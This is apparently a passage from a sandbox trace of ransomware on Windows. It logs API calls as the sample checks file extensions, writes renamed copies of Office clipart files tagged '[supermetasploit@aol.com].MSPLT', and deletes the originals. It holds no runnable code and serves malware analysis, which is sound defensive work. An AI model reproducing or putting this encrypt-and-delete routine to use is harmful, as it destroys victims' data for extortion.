lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.266] lstrlenW (lpString=".doc") returned 4 [0319.267] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString=".docx") returned 5 [0319.267] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0319.267] lstrlenW (lpString=".pdf") returned 4 [0319.267] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString=".xls") returned 4 [0319.267] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString=".xlsx") returned 5 [0319.267] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0319.267] lstrlenW (lpString=".ppt") returned 4 [0319.267] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.267] lstrlenW (lpString=".zip") returned 4 [0319.267] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString=".rar") returned 4 [0319.267] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0319.267] lstrlenW (lpString=".bz2") returned 4 [0319.267] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0319.267] lstrlenW (lpString=".7z") returned 3 [0319.267] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0319.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.267] lstrlenW (lpString=".dbf") returned 4 [0319.267] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0319.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.267] lstrlenW (lpString=".1cd") returned 4 [0319.267] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0319.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.268] lstrlenW (lpString=".jpg") returned 4 [0319.268] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0319.268] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.268] lstrlenW (lpString="CMNTY_01.MID") returned 12 [0319.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.269] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=6970) returned 1 [0319.269] CloseHandle (hObject=0x348) returned 1 [0319.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid")) returned 0x220 [0319.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.270] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.270] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.271] GetLastError () returned 0x0 [0319.271] ReadFile (in: hFile=0x348, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x1b3a, lpOverlapped=0x0) returned 1 [0319.276] WriteFile (in: hFile=0x438, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1b40, lpOverlapped=0x0) returned 1 [0319.285] ReadFile (in: hFile=0x348, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.285] WriteFile (in: hFile=0x438, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0319.285] SetEndOfFile (hFile=0x438) returned 1 [0319.285] CloseHandle (hObject=0x438) returned 1 [0319.286] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.286] SetEndOfFile (hFile=0x348) returned 1 [0319.289] CloseHandle (hObject=0x348) returned 1 [0319.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.290] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid")) returned 1 [0319.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.291] lstrlenW (lpString=".doc") returned 4 [0319.291] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.291] lstrlenW (lpString=".docx") returned 5 [0319.291] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.291] lstrlenW (lpString=".pdf") returned 4 [0319.291] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.291] lstrlenW (lpString=".xls") returned 4 [0319.291] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.291] lstrlenW (lpString=".xlsx") returned 5 [0319.291] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.291] lstrlenW (lpString=".ppt") returned 4 [0319.292] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString=".zip") returned 4 [0319.292] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.292] lstrlenW (lpString=".rar") returned 4 [0319.292] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.292] lstrlenW (lpString=".bz2") returned 4 [0319.292] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.292] lstrlenW (lpString=".7z") returned 3 [0319.292] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString=".dbf") returned 4 [0319.292] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString=".1cd") returned 4 [0319.292] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString=".jpg") returned 4 [0319.292] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.292] lstrlenW (lpString=".doc") returned 4 [0319.293] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.293] lstrlenW (lpString=".docx") returned 5 [0319.293] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.293] lstrlenW (lpString=".pdf") returned 4 [0319.293] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.293] lstrlenW (lpString=".xls") returned 4 [0319.293] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.293] lstrlenW (lpString=".xlsx") returned 5 [0319.293] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.293] lstrlenW (lpString=".ppt") returned 4 [0319.293] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.293] lstrlenW (lpString=".zip") returned 4 [0319.293] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.293] lstrlenW (lpString=".rar") returned 4 [0319.293] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.293] lstrlenW (lpString=".bz2") returned 4 [0319.293] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.294] lstrlenW (lpString=".7z") returned 3 [0319.294] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.294] lstrlenW (lpString=".dbf") returned 4 [0319.294] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.294] lstrlenW (lpString=".1cd") returned 4 [0319.294] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 68 [0319.294] lstrlenW (lpString=".jpg") returned 4 [0319.294] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.294] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.294] lstrlenW (lpString="EAST_01.MID") returned 11 [0319.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.296] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=6165) returned 1 [0319.296] CloseHandle (hObject=0x348) returned 1 [0319.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid")) returned 0x220 [0319.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.297] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.297] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.298] GetLastError () returned 0x0 [0319.298] ReadFile (in: hFile=0x348, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x1815, lpOverlapped=0x0) returned 1 [0319.337] WriteFile (in: hFile=0x438, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1820, lpOverlapped=0x0) returned 1 [0319.338] ReadFile (in: hFile=0x348, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.338] WriteFile (in: hFile=0x438, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xea, lpOverlapped=0x0) returned 1 [0319.339] SetEndOfFile (hFile=0x438) returned 1 [0319.339] CloseHandle (hObject=0x438) returned 1 [0319.339] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.339] SetEndOfFile (hFile=0x348) returned 1 [0319.342] CloseHandle (hObject=0x348) returned 1 [0319.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid")) returned 1 [0319.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.349] lstrlenW (lpString=".doc") returned 4 [0319.349] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.350] lstrlenW (lpString=".docx") returned 5 [0319.350] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.350] lstrlenW (lpString=".pdf") returned 4 [0319.350] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.350] lstrlenW (lpString=".xls") returned 4 [0319.350] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.350] lstrlenW (lpString=".xlsx") returned 5 [0319.350] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.350] lstrlenW (lpString=".ppt") returned 4 [0319.350] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.350] lstrlenW (lpString=".zip") returned 4 [0319.350] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.350] lstrlenW (lpString=".rar") returned 4 [0319.350] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.350] lstrlenW (lpString=".bz2") returned 4 [0319.350] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.350] lstrlenW (lpString=".7z") returned 3 [0319.350] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.350] lstrlenW (lpString=".dbf") returned 4 [0319.350] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.350] lstrlenW (lpString=".1cd") returned 4 [0319.351] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.351] lstrlenW (lpString=".jpg") returned 4 [0319.351] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.351] lstrlenW (lpString=".doc") returned 4 [0319.351] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.351] lstrlenW (lpString=".docx") returned 5 [0319.351] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.351] lstrlenW (lpString=".pdf") returned 4 [0319.351] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.351] lstrlenW (lpString=".xls") returned 4 [0319.351] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.351] lstrlenW (lpString=".xlsx") returned 5 [0319.351] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.351] lstrlenW (lpString=".ppt") returned 4 [0319.351] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.351] lstrlenW (lpString=".zip") returned 4 [0319.351] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.351] lstrlenW (lpString=".rar") returned 4 [0319.351] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.351] lstrlenW (lpString=".bz2") returned 4 [0319.352] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.352] lstrlenW (lpString=".7z") returned 3 [0319.352] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.352] lstrlenW (lpString=".dbf") returned 4 [0319.352] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.352] lstrlenW (lpString=".1cd") returned 4 [0319.352] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 67 [0319.352] lstrlenW (lpString=".jpg") returned 4 [0319.352] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.352] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.352] lstrlenW (lpString="EXPLR_01.MID") returned 12 [0319.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.378] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=10562) returned 1 [0319.378] CloseHandle (hObject=0x528) returned 1 [0319.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid")) returned 0x220 [0319.397] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.398] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.398] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.400] GetLastError () returned 0x0 [0319.400] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x2942, lpOverlapped=0x0) returned 1 [0319.420] WriteFile (in: hFile=0x488, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x2950, lpOverlapped=0x0) returned 1 [0319.422] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.423] WriteFile (in: hFile=0x488, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0319.423] SetEndOfFile (hFile=0x488) returned 1 [0319.423] CloseHandle (hObject=0x488) returned 1 [0319.423] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.423] SetEndOfFile (hFile=0x528) returned 1 [0319.429] CloseHandle (hObject=0x528) returned 1 [0319.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.431] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0319.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.432] lstrlenW (lpString=".doc") returned 4 [0319.432] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.432] lstrlenW (lpString=".docx") returned 5 [0319.432] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.432] lstrlenW (lpString=".pdf") returned 4 [0319.432] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.432] lstrlenW (lpString=".xls") returned 4 [0319.432] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.432] lstrlenW (lpString=".xlsx") returned 5 [0319.432] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.432] lstrlenW (lpString=".ppt") returned 4 [0319.432] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.433] lstrlenW (lpString=".zip") returned 4 [0319.433] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.433] lstrlenW (lpString=".rar") returned 4 [0319.433] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.433] lstrlenW (lpString=".bz2") returned 4 [0319.433] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.433] lstrlenW (lpString=".7z") returned 3 [0319.433] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.433] lstrlenW (lpString=".dbf") returned 4 [0319.433] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.433] lstrlenW (lpString=".1cd") returned 4 [0319.433] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.433] lstrlenW (lpString=".jpg") returned 4 [0319.433] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.434] lstrlenW (lpString=".doc") returned 4 [0319.434] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.434] lstrlenW (lpString=".docx") returned 5 [0319.434] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.434] lstrlenW (lpString=".pdf") returned 4 [0319.434] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.434] lstrlenW 